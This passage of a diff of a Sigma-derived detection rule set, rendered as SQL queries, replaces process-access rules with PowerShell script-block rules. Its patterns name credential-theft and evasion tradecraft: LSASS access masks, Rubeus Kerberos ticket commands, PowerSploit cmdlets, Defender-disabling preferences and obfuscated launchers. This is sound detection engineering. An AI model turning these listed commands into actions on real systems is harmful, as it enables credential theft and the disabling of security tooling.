ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" + "filename": "posh_ps_malicious_commandlets.yml" }, { - "title": "SysmonEnte Usage", - "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", - "status": "experimental", - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Credential Prompt", + "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "status": "test", + "description": "Detects PowerShell calling a credential prompt", + "author": "John Lambert (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.credential_access", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" ], - "filename": "proc_access_win_hack_sysmonente.yml" + "filename": "posh_ps_prompt_credentials.yml" }, { - "title": "Suspicious LSASS Access Via MalSecLogon", - "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", - "status": "experimental", - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "title": "Request A Single Ticket via PowerShell", + "id": "a861d835-af37-4930-bcd6-5b178bfb54df", + "status": "test", + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_seclogon.yml" + "filename": "posh_ps_request_kerberos_ticket.yml" }, { - "title": "Potential Svchost Memory Access", - "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", + "id": "e54f5149-6ba3-49cf-b153-070d24679126", "status": "experimental", - "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "author": "Tim Burrell", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "proc_access_win_invoke_phantom.yml" + "filename": "posh_ps_invoke_obfuscation_via_var.yml" }, { - "title": "Lsass Memory Dump via Comsvcs DLL", - "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "status": "test", - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", + "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" ], - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + "filename": "posh_ps_invoke_obfuscation_stdin.yml" }, { - "title": "UAC Bypass Using WOW64 Logger DLL Hijack", - "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", + "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "proc_access_win_uac_bypass_wow64_logger.yml" + "filename": "posh_ps_invoke_obfuscation_var.yml" }, { - "title": "Potential Shellcode Injection", - "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "title": "Disable Powershell Command History", + "id": "602f5669-6927-4688-84db-0d4b7afb2150", "status": "experimental", - "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", - "author": "Bhabesh Raj", + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + "author": "Ali Alwashali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1070.003" ], "falsepositives": [ - "Unknown" + "Legitimate script that disables the command history" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" ], - "filename": "proc_access_win_shellcode_inject_msf_empire.yml" + "filename": "posh_ps_disable_psreadline_command_history.yml" }, { - "title": "CMSTP Execution Process Access", - "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", + "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.003", + "attack.t1027", "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE CallTrace LIKE '%cmlua.dll%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "proc_access_win_cmstp_execution_by_access.yml" + "filename": "posh_ps_invoke_obfuscation_clip.yml" }, { - "title": "Credential Dumping Tools Accessing LSASS Memory", - "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", - "status": "experimental", - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", + "title": "Create Volume Shadow Copy with Powershell", + "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "status": "test", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" + "attack.t1003.003" ], "falsepositives": [ - "Likely" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" ], - "filename": "proc_access_win_cred_dump_lsass_access.yml" + "filename": "posh_ps_create_volume_shadow_copy.yml" }, { - "title": "CobaltStrike BOF Injection Pattern", - "id": "09706624-b7f6-455d-9d02-adee024cee1d", - "status": "test", - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "author": "Christian Burkard (Nextron Systems)", + "title": "Tamper Windows Defender - ScriptBlockLogging", + "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "status": "experimental", + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "author": "frack113, elhoim, Tim Shelton (fps, alias support)", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" + "filename": "posh_ps_tamper_defender.yml" }, { - "title": "LSASS Memory Dump", - "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "status": "experimental", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Samir Bousseaden, Michael Haag", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "title": "Dnscat Execution", + "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "status": "test", + "description": "Dnscat exfiltration tool execution", + "author": "Daniil Yugoslavskiy, oscd.community", + "tags": [ + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives are present when looking for 0x1410. Exclusions may be required." + "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump.yml" + "filename": "posh_ps_dnscat_execution.yml" }, { - "title": "Load Undocumented Autoelevated COM Interface", - "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", - "status": "test", - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "author": "oscd.community, Dmitry Uchakin", + "title": "HackTool - Rubeus Execution - ScriptBlock", + "id": "3245cd30-e015-40ff-a31d-5cadd5f377ec", + "status": "experimental", + "description": "Detects the execution of the hacktool Rubeus using specific command line flags", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%asreproast %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /luid:0x%' ESCAPE '\\' OR ScriptBlockText LIKE '%kerberoast %' ESCAPE '\\' OR ScriptBlockText LIKE '%createnetonly /program:%' ESCAPE '\\' OR ScriptBlockText LIKE '%ptt /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%/impersonateuser:%' ESCAPE '\\' OR ScriptBlockText LIKE '%renew /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%asktgt /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%harvest /interval:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%hash /password:%' ESCAPE '\\' OR ScriptBlockText LIKE '%golden /aes256:%' ESCAPE '\\' OR ScriptBlockText LIKE '%silver /user:%' ESCAPE '\\'))" ], - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" + "filename": "posh_ps_hktl_rubeus.yml" }, { - "title": "HandleKatz Duplicating LSASS Handle", - "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "status": "experimental", - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "author": "Bhabesh Raj (rule), @thefLinkk", + "title": "Malicious PowerView PowerShell Commandlets", + "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "status": "test", + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "author": "Bhabesh Raj", "tags": [ "attack.execution", - "attack.t1106", - 